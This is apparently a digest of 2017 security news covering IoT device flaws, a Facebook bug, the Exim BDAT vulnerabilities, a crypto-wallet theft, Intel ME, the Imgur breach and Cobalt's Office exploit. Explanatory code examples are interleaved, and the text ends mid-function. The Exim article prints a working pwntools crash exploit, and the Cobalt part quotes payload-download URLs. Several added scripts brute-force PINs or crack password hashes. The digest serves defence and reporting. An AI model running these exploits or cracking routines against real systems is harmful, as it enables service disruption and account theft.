No need to worry if you miss the chance to intercept the authentication data. Given that the data exchange between the app and the device is not encrypted, you would be able to intercept a token transmitted from the server to the application and then create your own commands to the iron.

As a result, within the local network an attacker can perform:

Identity theft (steal personal email address, username, password)
Extortion (take advantage of the ignorance of the user to enable ‘safe mode’ so that the user could not mechanically turn on the iron, and to demand money for disabling ‘safe mode’)
Of course, both of these vectors are unlikely to be exploited widely in the wild, but they are still possible. Just imagine how embarrassing it would be if your private information were compromised, not by a sophisticated hacker, but because of the poor security of your smart iron.

Smart home hub
The biggest problem with the vast majority of connected devices currently available is that most of them work with your smartphone as separate, independent devices and are not integrated into a larger smart ecosystem. The problem is partly solved by so-called smart hubs: nodes that bring the data exchange between multiple separate smart devices together in one place. Although the prior art on finding a secure smart hub, produced by multiple other researchers, leaves little room for hope, we tried anyway and took a fancy smart hub with a touch screen and support for several IoT protocols. It is universally compatible, works with the ZigBee and Z-Wave home automation standards, and is very easy to set up: according to the manufacturer, it can be configured within three minutes using the touchscreen.
 

In addition the hub serves as a wireless Wi-Fi router.

Given all the roles this multi-purpose device can play (router, range extender, access point or wireless bridge), we decided to check one of the most common and most dangerous risks associated with it: unauthorized external access to the router. If successful, such access could lead to full control of the user’s smart home, including all connected devices.

And, no surprise, our research has shown there is such a possibility.

To check our assumption we built a local network by connecting a PC, the device and one more router to each other. All network devices received IP addresses, and we scanned the hub for open ports. This showed that, by default, two ports are open on the WAN side. The first, port 80, is the standard HTTP port: the one through which a web server receives requests from web clients and sends back HTML pages or data. Open on the WAN side, it means that anyone who can reach the device can talk to its web interface over HTTP.

The second, port 22, is used by SSH (Secure Shell) servers for remote control of the device. Attackers can gain access to the device if they obtain or successfully brute-force the root password. Usually that is not an easy task. However, in our research we found another risky property of the smart hub that makes it much easier.

While analyzing the router, we discovered that it suffers from a very common weakness: weak password generation. In the router’s filesystem we found an ELF (Executable and Linkable Format) binary, ‘rname’, containing a list of names. By comparing this list with the password displayed on the screen, it became clear that the device’s password is generated from the names in this file, so brute-forcing it does not take long.

After a hard reset, the base from which passwords are generated stayed the same, with only a few characters changed. That still leaves an attacker a realistic chance of generating the password.

In addition, we found that the root account is always used for device access. Thus, an attacker already knows the login and the base part of the password, which significantly facilitates an attack.

If the device has a public IP address and the ports described above are open, the router can be reached from the internet. Alternatively, if an ISP (Internet Service Provider) improperly configures visibility between neighboring hosts, these devices will be reachable by every other customer on the same ISP network segment.

In all, we weren’t surprised; just like most other smart hubs on the market, this one offers an intruder a really vast attack surface. And that surface covers not only the device itself but the network it works on. Here are the conclusions our experiment led us to.

Conclusions
Based on what we’ve seen while doing this exercise, the vendors of many IoT-devices developing their products assume that:

They won’t be attacked due to limited device functionality and a lack of serious consequences in the case of a successful attack.
The appropriate level of security for an IoT-device is when there is no easy way to communicate with the wider internet and the attacker needs to have access to the local network the device is connected to.
We have to say that these assumptions are reasonable, but only until the moment a vulnerable router or multifunctional smart hub, like the one described above, appears on the network to which all the other devices are connected. From that moment, all the other devices, no matter how severe or trivial their own security issues, are exposed to interference. It is easy to imagine a house, apartment or office populated with all these devices at once, and just as easy to imagine what a nightmare it would be if someone tried each of the described threat vectors.

So in answer to the question we asked ourselves at the beginning of this experiment, we can say that, based on our results at least, it is still hard to find a perfectly secure IoT-device.

On the other hand, no matter which device you purchase, most likely it won’t carry really severe security issues of its own, but again, only until you connect it to a vulnerable router or smart hub.
 

Keeping that and the ongoing high sales holiday season in mind we’d like to share the following advice on how to choose IoT devices:

When choosing what part of your life you’re going to make a little bit smarter, consider the security risks. Think twice if you really need a camera-equipped robo vacuum cleaner or a smart iron, which can potentially spill some of your personal data to an unknown third-party.
Before buying an IoT device, search the internet for news of any vulnerability. The Internet of Things is a very hot topic now, and a lot of researchers are doing a great job of finding security issues in products of this kind: from baby monitors to app controlled rifles. It is likely that the device you are going to purchase has already been examined by security researchers and it is possible to find out whether the issues found in the device have been patched.
It is not always a great idea to buy the most recent products released on the market. Along with the standard bugs you get in new products, recently-launched devices might contain security issues that haven’t yet been discovered by security researchers. The best choice is to buy products that have already experienced several software updates.
To overcome challenges of smart devices’ cybersecurity, Kaspersky Lab has released a beta version of its solution for the ‘smart’ home and the Internet of Things – the Kaspersky IoT Scanner. This free application for the Android platform scans the home Wi-Fi network, informing the user about devices connected to it and their level of security.
When it comes to the vendors of IoT-devices, the advice is simple: collaborate with the security vendors and community when developing new devices and improving old ones.

P.S. 1 out of 8
There was one random device in our research, which showed strong enough security for us at least not to be worried about private data leakage or any other devastating consequences. It was a smart watch. Like most other similar devices, these watches require an app to pair them with the smartphone and use. From that moment, most of data exchange between the device and the smartphone, the app and the vendors’ cloud service are reliably encrypted and, without a really deep dive into encryption protocol features or the vendor’s cloud services it is really hard to do anything malicious with the device.

For pairing, the owner has to enter the PIN code displayed on the watch for authorization to succeed. The PIN is randomly generated and is not transmitted by the watch. After the PIN is entered in the app, the phone and the watch create the encryption key, and all subsequent communication is encrypted. Thus, even if BLE traffic is intercepted, an attacker still has to decrypt it, and to do so would need to have captured the traffic at the stage when the encryption key was being generated.

It is apparently impossible to get user data (steps, heart rate, etc.) directly from the device. Data synchronized from the watch to the phone is encrypted and forwarded to the server in the same form. Thus the data is never decrypted on the phone, so the encryption algorithm and the key remain unknown.
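The caveat in the previous paragraphs, that the watch’s BLE traffic is only at risk if the attacker captured the pairing exchange, is worth making concrete. The block below is an added example, not the watch vendor’s protocol or code: it models a constructed toy pairing in which the session key is derived only from the displayed PIN and two nonces exchanged in the clear. Whoever records that exchange can try every PIN offline and recover the key; nothing recorded after pairing helps. The HKDF, the confirm value and the PIN length are assumptions of the example.

```python
import hashlib
import hmac
import os

HASH = hashlib.sha256


def hkdf(ikm: bytes, salt: bytes, info: bytes, length: int = 32) -> bytes:
    """RFC 5869 HKDF (extract + expand) with HMAC-SHA256."""
    prk = hmac.new(salt, ikm, HASH).digest()
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), HASH).digest()
        okm += block
        counter += 1
    return okm[:length]


def derive_session_key(pin: str, nonce_watch: bytes, nonce_phone: bytes) -> bytes:
    """Toy pairing (constructed, not the vendor's): both sides mix the PIN the
    user typed with the two nonces they exchanged in the clear over BLE."""
    return hkdf(pin.encode("ascii"), nonce_watch + nonce_phone, b"toy-ble-pairing")


def confirm_value(key: bytes) -> bytes:
    """Sent by the watch so the phone can check it derived the same key."""
    return hmac.new(key, b"confirm", HASH).digest()


def pairing_exchange(pin: str):
    """What a BLE sniffer captures during pairing: both nonces and the confirm
    value. The PIN itself never goes over the air, exactly as the text says."""
    nonce_watch, nonce_phone = os.urandom(16), os.urandom(16)
    key = derive_session_key(pin, nonce_watch, nonce_phone)
    return nonce_watch, nonce_phone, confirm_value(key)


def recover_pin(nonce_watch: bytes, nonce_phone: bytes, confirm: bytes, digits: int = 6):
    """Passive attacker with the captured exchange: try every PIN offline.
    10**6 HKDF computations for a 6-digit PIN is seconds of CPU time."""
    for n in range(10 ** digits):
        guess = str(n).zfill(digits)
        key = derive_session_key(guess, nonce_watch, nonce_phone)
        if hmac.compare_digest(confirm_value(key), confirm):
            return guess, key
    return None, None


if __name__ == "__main__":
    nonce_w, nonce_p, confirm = pairing_exchange("004217")   # constructed PIN
    print(recover_pin(nonce_w, nonce_p, confirm))             # ('004217', <32-byte key>)
```

This is why the capture window matters: a short PIN can authenticate a pairing but must not be the only secret the key is derived from. Bluetooth LE Secure Connections (Bluetooth 4.2 and later) runs an ECDH key agreement and uses the passkey only to authenticate it, whereas legacy LE pairing derives its temporary key from the passkey and is known to be brute-forceable by a sniffer in exactly this way.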
 

From our perspective this is an example of a really responsible approach to the product, because, by default the vendor of this device could also easily limit their security efforts to assuming that no one will try to hack their watches, as, even if successful, nothing serious happens. This is probably true: it is hard to imagine a hacker who would pursue an opportunity to steal information about how many steps you made or how fast your heart beats at any given moment of the day. Nevertheless, the vendor did their best to eliminate even that small possibility. And this is good, because cybersecurity is not all those boring and costly procedures which you have to implement because some hackers found some errors in your products, we think cybersecurity is an important and valuable feature of an IoT-product, just like its usability, design and list of useful functions. We are sure that as soon as IoT-vendors understand this fact clearly, the whole connected ecosystem will become much more secure than it is now.


Facebook Flaw Allowed Removal of Any Photo
27.11.2017 securityweek Social
A researcher says he received a $10,000 bounty from Facebook after finding a critical vulnerability that could have been exploited to delete any photo from the social media network.

In early November, Facebook announced a new feature for posting polls that include images and GIF animations. Iran-based security researcher and web developer Pouya Darabi analyzed the feature shortly after its launch and discovered that it introduced an easy-to-exploit flaw.

When a user created a poll, the request sent to Facebook servers included the identifiers of the image files added to the poll. The expert noticed that users could replace the image ID in the request with the ID of any photo on Facebook and that photo would appear in the poll.

Darabi then discovered that once the creator of the poll deleted the post, the image whose ID was added to the request would also get removed from Facebook.
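The flaw is the classic insecure-direct-object-reference pattern: the server trusted the photo IDs in the poll request, and a later cascade (delete the post, delete the photos attached to it) acted on whatever IDs were there. The model below is an added example, not Facebook’s code, with constructed users and photo IDs. It shows the trusting version beside one that authorizes each referenced object both when it is attached and again when it is destroyed.

```python
class NotAuthorized(Exception):
    """Raised when a request references a resource its sender does not own."""


class PhotoService:
    """Constructed model of the poll feature: posts carry photo IDs, and deleting
    a post also deletes the photos attached to it (the behaviour the article
    describes). The *_vulnerable methods trust the IDs in the request; the
    *_fixed ones check ownership at attach time and again at delete time."""

    def __init__(self):
        # photo_id -> owner (constructed sample data)
        self.photos = {101: "alice", 202: "bob", 303: "bob"}
        self.posts = {}
        self._next_post = 1

    # -- vulnerable ---------------------------------------------------------
    def create_poll_vulnerable(self, user, image_ids):
        post_id, self._next_post = self._next_post, self._next_post + 1
        # Any ID on the site is accepted, including photos the poster never owned.
        self.posts[post_id] = {"owner": user, "images": list(image_ids)}
        return post_id

    def delete_post_vulnerable(self, user, post_id):
        post = self.posts.get(post_id)
        if post is None or post["owner"] != user:
            raise NotAuthorized("not your post")
        del self.posts[post_id]
        for image_id in post["images"]:
            # Cascades to whatever IDs were attached, regardless of who owns them.
            self.photos.pop(image_id, None)

    # -- fixed ----------------------------------------------------------------
    def _assert_owns_photo(self, user, image_id):
        if self.photos.get(image_id) != user:
            raise NotAuthorized(f"photo {image_id} is not owned by {user}")

    def create_poll_fixed(self, user, image_ids):
        for image_id in image_ids:
            self._assert_owns_photo(user, image_id)   # authorize every referenced object
        post_id, self._next_post = self._next_post, self._next_post + 1
        self.posts[post_id] = {"owner": user, "images": list(image_ids)}
        return post_id

    def delete_post_fixed(self, user, post_id):
        post = self.posts.get(post_id)
        if post is None or post["owner"] != user:
            raise NotAuthorized("not your post")
        del self.posts[post_id]
        for image_id in post["images"]:
            # Re-check at the point of destruction: the cascade must not rely on
            # what an earlier request (or an older, unpatched code path) accepted.
            if self.photos.get(image_id) == user:
                del self.photos[image_id]


def demo():
    """Returns (bob's photo survives the vulnerable flow?, survives the fixed flow?)."""
    svc = PhotoService()
    post = svc.create_poll_vulnerable("alice", [202])   # attacker swaps in bob's photo ID
    svc.delete_post_vulnerable("alice", post)
    survives_vulnerable = 202 in svc.photos

    svc = PhotoService()
    try:
        svc.create_poll_fixed("alice", [202])
    except NotAuthorized:
        pass
    survives_fixed = 202 in svc.photos
    return survives_vulnerable, survives_fixed


if __name__ == "__main__":
    print(demo())   # (False, True)
```

The second ownership check in delete_post_fixed is the one that would have contained this bug even if the attach-time check had been missed: authorization belongs at every point where an object is read, modified or destroyed, not only where it is first referenced.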

The vulnerability was reported to Facebook on November 3 and a temporary fix was rolled out the same day. The company deployed a complete patch on November 5.

Darabi said he received a $10,000 bug bounty for his findings. The researcher has published a blog post and a video describing the vulnerability.

This was not the first time Darabi earned a significant bounty from Facebook. Back in 2015, the social media giant awarded him $15,000 for bypassing its cross-site request forgery (CSRF) protection systems. The next year he received another $7,500 for a similar weakness.

These types of vulnerabilities are not uncommon on Facebook. In the past years, researchers reported finding several flaws that could have been exploited to delete comments, videos, and photos from Facebook. The security holes, which in most cases involved replacing the ID of the targeted resource in a request, earned researchers roughly $10,000.

Facebook has paid out millions of dollars to researchers who found vulnerabilities in the social media network since the launch of its bug bounty program in 2011.


Unix mailer Exim is affected by RCE, DoS vulnerabilities. Apply the workaround asap
27.11.2017 securityaffairs Vulnerability

The Exim project warned of the flaws through its public bug tracker; sysadmins should apply the workaround as soon as possible.
Exim is a message transfer agent (MTA) developed at the University of Cambridge for Unix systems connected to the Internet; it is the most widely deployed MTA on the Internet.

The project disclosed the flaws through its public bug tracker, an unfortunate choice because a notice there is easily missed.

According to the message on the bug tracker, when handling BDAT data Exim scans for the ‘.’ character that signifies the end of an e-mail.

“A remote code execution vulnerability has been reported in Exim, with immediate public disclosure (we were given no private notice). A tentative patch exists but has not yet been confirmed.

With immediate effect, please apply this workaround: if you are running Exim 4.88 or newer (4.89 is current, 4.90 is upcoming) then in the main section of your Exim configuration, set:

chunking_advertise_hosts =

That’s an empty value, nothing on the right of the equals. This disables advertising the ESMTP CHUNKING extension, making the BDAT verb unavailable and avoids letting an attacker apply the logic.”

Assigning an empty value to chunking_advertise_hosts turns off the vulnerable feature: the server no longer advertises CHUNKING in its EHLO reply, so clients cannot use the BDAT command.


The advisory included proof-of-concept code that crashes Exim because the receive_getc function pointer is not reset after the BDAT handling (the use-after-free tracked as CVE-2017-16943).

# pip install pwntools
from pwn import *

# PoC from the Exim bug tracker, annotated; it crashes the daemon rather than
# demonstrating code execution. Bytes literals are used throughout so the
# script also runs under Python 3 pwntools.
r = remote('localhost', 25)

r.recvline()                                    # 220 greeting
r.sendline(b"EHLO test")
r.recvuntil(b"250 HELP")                        # end of the EHLO reply; CHUNKING must be among the advertised keywords
r.sendline(b"MAIL FROM:<test@localhost>")
r.recvline()
r.sendline(b"RCPT TO:<test@localhost>")
r.recvline()
#raw_input()
r.sendline(b'a' * 0x1100 + b'\x7f')             # 0x1100 bytes of junk ending in a DEL byte, as in the original PoC
#raw_input()
r.recvuntil(b'command')                         # "500 unrecognized command"
r.sendline(b'BDAT 1')                           # BDAT switches Exim's receive_getc pointer to the chunking reader ...
r.sendline(b':BDAT \x7f')                       # ... and it is never reset afterwards
s = b'a' * 6 + p64(0xdeadbeef) * (0x1e00 // 8)  # 0x1e00 bytes of controlled filler; integer division for Python 3
r.send(s + b':\r\n')
r.recvuntil(b'command')
#raw_input()
r.send(b'\n')                                   # the next read goes through the stale pointer and Exim crashes
r.interactive()
exit()
Below is the NVD entry for CVE-2017-16944, the denial-of-service vulnerability affecting the SMTP daemon in Exim 4.88 and 4.89.

“The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a ‘.’ character signifying the end of the content, related to the bdat_getc function.” states the entry published by NIST.

Sysadmins should stop advertising CHUNKING (which makes the BDAT verb unavailable) while waiting for the imminent patch.
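A quick way to confirm that the workaround took effect (an added example, not from the Exim project): speak EHLO to the MTA and check whether CHUNKING is still in the advertised keyword list. The fake listener, its banner and the keyword lists are constructed so the check can be run offline; point ehlo_extensions() at a real host and port 25 to audit it.

```python
import socket
import threading


def ehlo_extensions(host, port=25, helo_name="audit.example", timeout=5.0):
    """Connect, send EHLO and return the set of ESMTP keywords the server
    advertises, e.g. {"SIZE", "PIPELINING", "CHUNKING", "HELP"}."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        reader = sock.makefile("rb")
        line = reader.readline()                  # 220 greeting, possibly multi-line "220-..."
        while line.startswith(b"220-"):
            line = reader.readline()
        if not line.startswith(b"220"):
            raise RuntimeError(f"unexpected greeting: {line!r}")
        sock.sendall(f"EHLO {helo_name}\r\n".encode("ascii"))
        keywords, first = set(), True
        while True:
            line = reader.readline().decode("ascii", "replace").rstrip("\r\n")
            if not line.startswith("250"):
                raise RuntimeError(f"EHLO rejected: {line!r}")
            if not first:                         # the first 250 line is the server's name, not a keyword
                body = line[4:].strip()
                if body:
                    keywords.add(body.split()[0].upper())
            first = False
            if line[3:4] == " ":                  # "250 " ends the reply, "250-" continues it
                break
        try:
            sock.sendall(b"QUIT\r\n")
        except OSError:
            pass                                  # server may already have hung up; we have what we need
        return keywords


def chunking_advertised(host, port=25):
    """True if the MTA still offers CHUNKING, i.e. BDAT is reachable and the
    chunking_advertise_hosts workaround is not in effect."""
    return "CHUNKING" in ehlo_extensions(host, port)


def start_fake_mta(extensions):
    """Constructed stand-in for an Exim listener so the check can run offline.
    `extensions` is the list of keyword lines it advertises after EHLO."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(b"220 mx.test ESMTP (constructed)\r\n")
                conn.makefile("rb").readline()            # consume the EHLO
                lines = [b"250-mx.test Hello audit.example"]
                lines += [b"250-" + e.encode("ascii") for e in extensions]
                lines.append(b"250 HELP")
                conn.sendall(b"\r\n".join(lines) + b"\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    srv, port = start_fake_mta(["SIZE 52428800", "PIPELINING", "CHUNKING"])
    print(chunking_advertised("127.0.0.1", port))   # True: workaround not applied
    srv.close()
```

Before the change to chunking_advertise_hosts the real MTA should report True here; after a configuration reload it should report False. Remember that the check only covers the workaround, not the patch itself.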


A Verge-specific node was hacked: crooks stole $655,000 from CoinPouch XVG Verge wallets
27.11.2017 securityaffairs Hacking

CoinPouch has publicly disclosed the hack of a Verge-specific node and the theft of $655,000 from its XVG Verge wallets.
A mystery surrounds the recent hack of CoinPouch wallet app, users lost over $655,000 worth of Verge cryptocurrency.

On Tuesday, the maintainers of the CoinPouch multi-currency wallet app published a statement that disclosed a security breach that affected its users who stored Verge currency in their wallets.

The project maintainers claimed the incident affected a Verge node set up with the help of Verge project maintainers to handle Verge transactions for Coin Pouch users.

“Users who held XVG Verge in Coin Pouch which was routed through the affected Verge Specific Node. Please note that at this time it appears that only Verge XVG wallets were affected. We have no information or customer reports to suggest that any other coins in CoinPouch were affected by this hack.” reads the announcement.

According to CoinPouch, a user reported having his Verge funds stolen on November 9. The initial investigation, conducted by the company together with the Verge project maintainers, found no evidence that the loss had been caused by a cyber attack.

The Verge development team provided specific settings for CoinPouch’s Verge node that would improve its security, but evidently those modifications were not enough.

Even though the developers applied the changes suggested by the Verge team, a few days later some users reported problems with their Verge wallets.

“A few days later, we started getting additional reports from users stating their Verge wallets in Coinpouch were not working correctly. So, we contacted Justin again to investigate the issue.” continues the statement. “During that investigation, it was discovered that most Verge tokens on the Verge Specific Node had been transferred out which prompted us to immediately shut down the Verge Specific Node once we were able to confirm that it was a hack.”

CoinPouch publicly disclosed the hack and filed a complaint with law enforcement, it also hired a forensics lab to conduct further investigation.

The CoinPouch statement also lists the steps taken so far:

“We have contacted the company that hosted the Verge Specific Node to request the server for forensics analysis.
We have contacted a computer forensics lab to initiate forensics analysis.
We have reported the incident to the proper law enforcement authorities.”

The good news is that the Verge team has traced the wallet the hackers used to receive the stolen funds; it contained over 126 million Verge coins.

The maintainers of the Verge project distanced themselves from CoinPouch, claiming the company was never listed as a recommended wallet on their website, and confirmed that it has since been removed from the site.

vergecurrency (@vergecurrency), 2:11 PM - Nov 23, 2017:
“To clarify situation and stop disinformation: It was 3rd party wallet @coinpouchapp that was hacked cos wasn't secured properly on their side. Not Verge blockchain. Independent forensic probe was ordered, as reported by #CoinPouch. Expect further status updates on their channels.”

vergecurrency (@vergecurrency), 6:20 PM - Nov 22, 2017:
“CoinPouch iOS wallet has been removed from our website.#xvg #verge #coinpouch #vergecurrency”

“This does not mean Verge was hacked nor does it mean Coinpouch was hacked. At this moment neither Coinpouch nor Justin, the founder and lead developer of Verge, are clear how the hack occurred,” reads the statement.


Hackers can attack Intel processors

27.11.2017 Novinky/Bezpečnost Hacking
Hackers can take control of other people’s computers remotely because of a newly discovered flaw in Intel processors. Security experts rate it as very serious. The Czech national security team CSIRT.CZ has drawn attention to it.

“Intel has issued a security advisory for vulnerabilities in the firmware of its Management Engine (Intel ME) products in versions 11.0/11.5/11.6/11.7/11.10/11.20, Server Platform Services (SPS) version 4.0 and Trusted Execution Engine (Intel TXE) version 3.0,” Pavel Bašta, a security analyst at CSIRT.CZ, which is operated by the CZ.NIC association, told Novinky.

He also stressed that all of these products contain firmware security vulnerabilities which, in the worst case, an attacker could exploit to take control of the system. Cyber criminals could then do whatever they like with the compromised machine remotely, including stealing user data or spying on the owner while they work on the PC.

Both companies and individuals are at risk, because the components in question are an integral part of the vast majority of modern Intel processors. The risk therefore concerns not only businesses but also individual users.

Patches are already available
Intel began addressing the problem immediately. “In response to issues identified by external researchers, Intel has performed an in-depth comprehensive security review of its technologies. Unfortunately, we did indeed find security weaknesses that could put some platforms at risk,” Intel representatives said in a statement.

The chip giant also published the processor families affected by the problems. An overview is given in the table at the end of this article.

The fixes were released by Intel itself. Companies such as Lenovo, Dell and HP have, however, announced that they also offer the patches to their customers through their own websites. Owners of affected platforms should therefore not delay and should install all available updates for their computers as quickly as possible.

“System administrators are advised to update using the available patch,” Bašta concluded.

Which systems are vulnerable
6th, 7th and 8th generation Intel Core processor family
Intel Xeon E3-1200 v5 and v6 processor product family
Intel Xeon Scalable processor family
Intel Xeon W-series processors
Intel Atom C3000 processor family
Apollo Lake Intel Atom E3900 series processors
Apollo Lake Intel Pentium processors
Celeron N and J series processors


Imgur Discloses 2014 Breach Affecting 1.7 Million Users
27.11.2017 securityweek Incident

Popular image hosting website Imgur notified users on Friday that hackers had stolen data associated with 1.7 million accounts as a result of a breach that occurred back in 2014.

The company learned about the hack from Australian security expert Troy Hunt, operator of the Have I Been Pwned breach notification service, and immediately began taking steps to address the situation.

“I want to recognise Imgur’s exemplary handling of this: that's 25 hours and 10 mins from my initial email to a press address to them mobilising people over Thanksgiving, assessing the data, beginning password resets and making a public disclosure,” Hunt said.

Others also praised the company for the way it handled the incident, with many comparing it to Uber, which attempted to cover up a massive 2016 breach that hit more than 57 million users.

Only email addresses and passwords were apparently compromised in the Imgur breach and the company says it does not ask users to provide any other data, such as real names, addresses or phone numbers.

At the time of the hack, the passwords had been stored as SHA-256 hashes. SHA-256 is a fast, general-purpose hash, so password hashes built from it can be cracked with precomputed tables: the MD5Decrypt service, for example, can return the plaintext for a SHA-256 hash if it is one of the 3.7 billion strings in its database. Imgur said it switched to the more secure bcrypt algorithm, a slow, salted password hash, sometime last year.
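Why a SHA-256 password store is a problem and a bcrypt-style one is not, as an added example that is not Imgur’s code: a fast hash can be reversed by looking it up in a table computed once and reused against every leaked record, whereas a salted, iterated hash defeats the table and makes each guess cost real CPU. The password list and user records are constructed; PBKDF2-HMAC-SHA256 from the standard library stands in for bcrypt, which the standard library does not include.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a cracking service's table: a handful of common
# passwords and their SHA-256 digests. Real tables hold billions of entries.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein", "imgur2014"]


def sha256_hex(password):
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def build_lookup_table(words):
    """digest -> plaintext; computed once, then reused against every leaked hash."""
    return {sha256_hex(w): w for w in words}


def crack_by_lookup(leaked_hashes, table):
    """Fast, unsalted hashes fall to a dictionary lookup: no per-user work at all."""
    return {h: table[h] for h in leaked_hashes if h in table}


# --- the slow, salted alternative -------------------------------------------
# Same properties bcrypt gives you: a random per-user salt, so one table cannot
# serve every account, and a tunable cost, so each guess is expensive.

def hash_password(password, iterations=200_000, salt=None):
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time comparison


def demo():
    """Returns (SHA-256 hashes cracked by lookup, PBKDF2 hashes cracked by lookup)."""
    table = build_lookup_table(COMMON_PASSWORDS)
    users = {"a@example.com": "password",          # constructed records
             "b@example.com": "imgur2014",
             "c@example.com": "Tr0ub4dor&3"}
    leaked_sha = [sha256_hex(p) for p in users.values()]
    leaked_pbkdf2 = [hash_password(p) for p in users.values()]
    cracked_sha = crack_by_lookup(leaked_sha, table)
    cracked_pbkdf2 = crack_by_lookup(leaked_pbkdf2, table)   # the table is useless here
    return len(cracked_sha), len(cracked_pbkdf2)


if __name__ == "__main__":
    print(demo())   # (2, 0)
```

The two weak passwords fall instantly to the lookup; the same two, salted and iterated, would each need the attacker to spend 200,000 HMAC computations per guess, per user, with no table to reuse. That asymmetry, not the hash function’s cryptographic strength, is what separates SHA-256 from bcrypt as a password store.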

Imgur is among the world’s largest 50 websites, with more than 150 million active users every month. In 2014, when the breach occurred, the site had roughly 130 million active monthly users. Some news articles describe these figures as “unique visitors,” which suggests that not all of these users have registered an account, especially since an account is not needed to view images posted on the website.

Nevertheless, it’s possible that the actual number of compromised accounts is much higher than 1.7 million. Hunt pointed out that the data he came across only appears to include passwords that were cracked. “I don’t know how much more data may have been originally obtained,” the expert said.

Hunt also noted that 60% of the compromised accounts had already been exposed in previous breaches tracked by Have I Been Pwned.

Imgur has notified affected users and is requiring them to change their passwords. The company’s investigation into this incident is ongoing.

“We take protection of your information very seriously and will be conducting an internal security review of our system and processes,” said Roy Sehgal, Chief Operating Officer of Imgur.


The Cobalt group is exploiting the CVE-2017-11882 Microsoft Office flaw in targeted attacks
27.11.2017 securityaffairs Vulnerability

A few days after details about the CVE-2017-11882 Microsoft Office flaw were publicly disclosed, the firm ReversingLabs observed the Cobalt group using it.
Security experts from ReversingLabs spotted a criminal gang exploiting the CVE-2017-11882 Microsoft Office vulnerability in the wild only a few days after its details became public.

The gang is the notorious Cobalt hacking group that across the years targeted banks and financial institutions worldwide.

The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365, and it can be triggered on all versions of Windows, including the latest Windows 10 Creators Update.


The CVE-2017-11882 flaw was discovered by the security researchers at Embedi, it affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

The component fails to properly handle objects in memory, a bug an attacker can exploit to execute malicious code in the context of the logged-in user.

The EQNEDT32.EXE component was introduced in Microsoft Office 2000 seventeen years ago and has been kept in Microsoft Office 2007 and later for backward compatibility, which is why all of those versions are affected.

According to Reversing Labs, the Cobalt group is now targeting organizations with malicious email using specifically crafted RTF documents that trigger the CVE-2017-11882 flaw.

The availability online of many exploits for CVE-2017-11882 allows threat actors to rapidly incorporate the attack code into their operations.

Valthek (@ValthekOn), 12:40 PM - Nov 23, 2017:
“My POC of CVE-2017-11882 Exploit using only 108 bytes and without size limit later, :) https://29wspy.ru/reversing/CVE-2017-11882.pdf … @hasherezade @Farenain @malwrhunterteam @malwareunicorn @51ddh4r7h4 @struppigel @Malwarebytes #Malware @demonslay335 @fwosar @BleepinComputer”
Other proof of concept (PoC) exploits are available online:

https://github.com/embedi/CVE-2017-11882
https://github.com/Ridter/CVE-2017-11882
https://github.com/unamer/CVE-2017-11882
The infection chain goes through multiple stages; in the final stage the malware downloads and loads a malicious DLL.

“The starting point of our analysis was an RTF seen in the wild:
bc4d2d914f7f0044f085b086ffda0cf2eb01287d0c0653665ceb1ddbc2fd3326

Using MS Equation CVE-2017-11882, it contacted
hxxp://104.254.99[.]77/x.txt
for first-stage payload, executed through MSHTA” reads the analysis published by ReversingLabs.

“When run, it downloads the next stage payload from
hxxp://104.254.99[.]77/out.ps1″

The script drops the embedded final second-stage payload – Cobalt, either a 32-bit or a 64-bit DLL, depending on the system architecture:
d8e1403446ac131ac3b62ce10a3ee93e385481968f21658779e084545042840f (32-bit)
fb97a028760cf5cee976f9ba516891cbe784d89c07a6f110a4552fc7dbfce5f4 (64-bit)

The analysis published by the security firm includes IoCs and also Yara rules to detect the threat.
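ReversingLabs’ Yara rules cover this campaign; as an added, lighter-weight complement (not the firm’s rules, and not Cobalt’s documents), the triage function below looks for the tell-tale signs of an embedded Equation Editor object in an RTF: the Equation.3 class name, the “Equation Native” stream name hidden in the hex of \objdata, and the \objupdate control word that makes the object activate when the document is opened. The sample documents are constructed stand-ins, not real exploit files, and a hit is a reason to look closer rather than a verdict, since Equation Editor objects also occur in legitimate documents.

```python
import re

# Indicators as they appear inside an RTF \objdata group (hex-encoded bytes):
# "Equation.3", the OLE1 class name Equation Editor objects carry, and
# "Equation Native", the UTF-16LE stream name inside the embedded OLE2 container.
HEX_EQUATION_3 = b"4571756174696f6e2e33"
HEX_EQUATION_NATIVE = b"4500710075006100740069006f006e0020004e0061007400690076006500"
OBJCLASS_EQUATION = re.compile(rb"\\objclass\s+Equation\.3", re.IGNORECASE)
OBJDATA = re.compile(rb"\\objdata\b([^{}]*)", re.DOTALL)


def objdata_blobs(rtf):
    """Return each \\objdata payload with whitespace removed and lower-cased.
    Malicious RTFs often break the hex across lines to dodge naive greps."""
    return [re.sub(rb"\s+", b"", m.group(1)).lower() for m in OBJDATA.finditer(rtf)]


def triage_rtf(rtf):
    """Cheap static triage of an RTF for an embedded Equation Editor object."""
    blobs = objdata_blobs(rtf)
    indicators = {
        "objclass_equation": bool(OBJCLASS_EQUATION.search(rtf)),
        "objdata_equation": any(HEX_EQUATION_3 in b or HEX_EQUATION_NATIVE in b for b in blobs),
        "objupdate": b"\\objupdate" in rtf,   # object activates on open, no click needed
        "objdata_count": len(blobs),
    }
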